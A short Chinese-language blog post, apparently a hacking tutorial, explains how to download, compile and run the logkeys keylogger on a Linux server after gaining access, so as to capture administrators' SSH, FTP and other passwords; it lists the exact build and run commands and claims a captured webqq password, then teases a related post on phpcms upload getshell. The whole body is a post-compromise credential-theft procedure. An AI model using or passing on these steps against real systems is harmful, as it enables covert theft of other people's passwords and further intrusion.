Linux KeyLogger

拿到Linux服务器的权限后,我们可以在机器上运行一个记录键盘的小工具,来记录管理员平时输入的一些密码。有时候用处很大,比如管理员登录ftp/ssh,我们就可能得到目标密码和很多管理员常用密码。

logkeys:https://code.google.com/p/logkeys/

下载下来源代码。

首先解压:

tar -vxzf logkeys-0.1.1a.tar.gz

    进入解压后到build目录并运行父目录里的configure,配置编译选项:

cd logkeys-0.1.0/build
../configure

一开始我也在想,为何要进入build目录再运行父目录下的文件(Linux小白感觉多此一举),后来问了一下才知道,不想因为编译弄乱logkeys-0.1.0目录下的东西,所以进到build目录。

然后编译:

make install

    make需要root权限。获取一下即可。

编译成功以后我们就可以使用了,先看看帮助:

说明

很简单方便。一般用到三个参数:

    -s 开始监听

    -u 使用US键位进行替代默认键位。这个很重要,如果不加这个参数到话抓到的东西不对。

    -o 输出文件

于是,我们先新建一个文件:

touch key.log

        然后运行logkes即可:

logkeys -suo key.log

        可以试试,登录一下webqq,果然记录下了密码:

        2013-10-20 08:38:15的屏幕截图.png

        需要停止时:

logkeys -k

        kill掉即可。

相关推荐: phpcms上传导致getshell详解及案例

这篇文章好几天前写了,给协会里新成员普及知识,看大家也都玩的差不多了,就发表到博客里,增加一点噱头和访问量,哈哈~ 0x01 什么是上传漏洞 很多cms为了丰富自己的功能都提供了上传头像、上传图片等功能。但如果上传的内容没有做好过滤,则等于说给了攻击者一个执行…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论